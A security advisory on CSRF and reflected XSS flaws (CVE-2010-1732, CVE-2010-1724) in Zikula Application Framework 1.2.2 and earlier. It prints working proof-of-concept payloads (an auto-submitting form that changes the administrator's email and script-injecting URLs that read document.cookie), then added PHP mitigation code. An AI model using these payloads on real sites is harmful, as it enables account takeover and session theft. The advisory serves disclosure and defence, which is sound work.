High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Zikula Application Framework, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.
XSRF (CSRF) in Zikula Application Framework: CVE-2010-1732
The vulnerability exists due to insufficient validation of the request origin. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator's email address. Successful exploitation may result in complete control of the application but requires user interaction.
Exploitation example:
```html
<form method="POST"
action="http://host/index.php?module=users&func=updateemail" name="main">
<input type="hidden" name="newemail" value="[email protected]">
<input type="hidden" name="submit" value="">
</form>
<script>
document.main.submit();
</script>
```
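The forged form above succeeds because the handler trusts any POST that carries the administrator's session cookie. The following is an added example, not Zikula's own code, of the standard mitigation: a per-session synchronizer token that the legitimate form embeds and the handler verifies before changing state, plus an Origin/Referer host check as a second layer. The function names, the form markup and the expected host are assumptions for illustration.

```php
<?php
// Added example (not Zikula code): synchronizer-token CSRF protection for a
// state-changing handler such as the "updateemail" action in the advisory.
// All function names here are hypothetical.

session_start();

// Issue one random token per session and reuse it for every form in that session.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session token.
function csrf_valid(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Defence in depth: the browser sets Origin (or Referer) on cross-site POSTs,
// and a request from another site will not carry our own host name.
function request_from_own_origin(array $server, string $expectedHost): bool {
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($origin, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// The legitimate form carries the token; the attacker's page cannot read it.
function render_email_form(): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="/index.php?module=users&amp;func=updateemail">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="email" name="newemail">'
         . '<input type="submit" value="Change e-mail">'
         . '</form>';
}

// The handler refuses the request unless both checks pass.
function handle_update_email(array $post, array $server, string $expectedHost): array {
    if (!request_from_own_origin($server, $expectedHost)) {
        return ['status' => 403, 'body' => 'Cross-origin request rejected'];
    }
    if (!csrf_valid($post)) {
        // The forged form in the advisory carries no token, so it stops here.
        return ['status' => 403, 'body' => 'Invalid or missing CSRF token'];
    }
    $email = filter_var($post['newemail'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return ['status' => 400, 'body' => 'Invalid e-mail address'];
    }
    // update_user_email($email);  // hypothetical persistence call
    return ['status' => 200, 'body' => 'E-mail updated'];
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $result = handle_update_email($_POST, $_SERVER, 'host');  // 'host' is a placeholder
    http_response_code($result['status']);
    echo htmlspecialchars($result['body'], ENT_QUOTES, 'UTF-8');
} else {
    echo render_email_form();
}
```

The token check is the primary control; the Origin/Referer check alone is not sufficient because some clients strip those headers, but it cheaply rejects the plain cross-site form post shown in the advisory before any further processing.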
Multiple XSS (Cross Site Scripting) vulnerabilities in Zikula Application Framework: CVE-2010-1724
2.1 The vulnerability exists due to an input validation error in the "lang" variable in ZLanguage.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in the user's browser in the context of the vulnerable website.
Exploitation examples:
http://host/?lang=en'"><img src=0 onerror=alert(document.cookie%29%3E
http://host/index.php?module=adminpanel&type=admin&func=adminpanel&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
2.2 An input validation error exists in the "func" variable in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in the user's browser in the context of the vulnerable website.
Exploitation examples:
http://host/index.php?module=tour&func=exttour'"><script>alert(234%29%3C/script%3E
http://host/index.php?module=search&func=recent'"%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
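Both XSS issues share one root cause: a request parameter is reflected into the HTML response without being constrained to the values the application actually supports or encoded for the context it lands in. The following is an added example, not Zikula's own code, of the two controls that close that class of bug: an allow-list for the "lang" value (a language code, not free text) and HTML output encoding for anything, such as the "func" name, that must be echoed back. The supported-language list, the markup and the function names are assumptions for illustration.

```php
<?php
// Added example (not Zikula code): safe handling of reflected "lang" and "func"
// request parameters. SUPPORTED_LANGS and all function names are hypothetical.

const SUPPORTED_LANGS = ['en', 'de', 'fr'];

// Allow-list: accept only a well-formed language tag that is actually installed;
// anything else silently falls back to the default instead of being reflected.
function resolve_lang(?string $lang, string $default = 'en'): string {
    if ($lang === null || !preg_match('/^[a-z]{2}(-[A-Z]{2})?$/', $lang)) {
        return $default;
    }
    return in_array($lang, SUPPORTED_LANGS, true) ? $lang : $default;
}

// Output encoding for any value placed into an HTML attribute or text node.
// ENT_QUOTES covers both quote characters, so the '" breakout in the advisory
// payloads is rendered as text rather than closing the attribute.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Dispatch by allow-list as well: an unknown function name is reported, but its
// raw value never reaches the page unencoded.
function render_page(array $get): string {
    $lang = resolve_lang($get['lang'] ?? null);
    $func = (string)($get['func'] ?? 'main');
    $known = ['main', 'recent', 'exttour'];  // hypothetical list of handlers

    $body = in_array($func, $known, true)
        ? '<p>Running ' . h($func) . '</p>'
        : '<p>Unknown function: ' . h($func) . '</p>';

    return '<html lang="' . h($lang) . '"><body>' . $body . '</body></html>';
}

// Constructed input mirroring the advisory's payloads (not a real request).
$payload = 'en\'"><img src=0 onerror=alert(document.cookie)>';
echo render_page(['lang' => $payload, 'func' => $payload]), PHP_EOL;
// Output: <html lang="en"><body><p>Unknown function: en&#039;&quot;&gt;&lt;img src=0 onerror=alert(document.cookie)&gt;</p></body></html>
```

The "lang" path never echoes the attacker-controlled string at all, which is the preferable fix where the set of valid values is finite; the "func" path shows the fallback for values that must be reflected, where context-appropriate encoding at the point of output is what prevents the injected markup from being parsed as HTML.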
| CPE | Name | Operator | Version |
|---|---|---|---|
| | zikula application framework | le | 1.2.2 |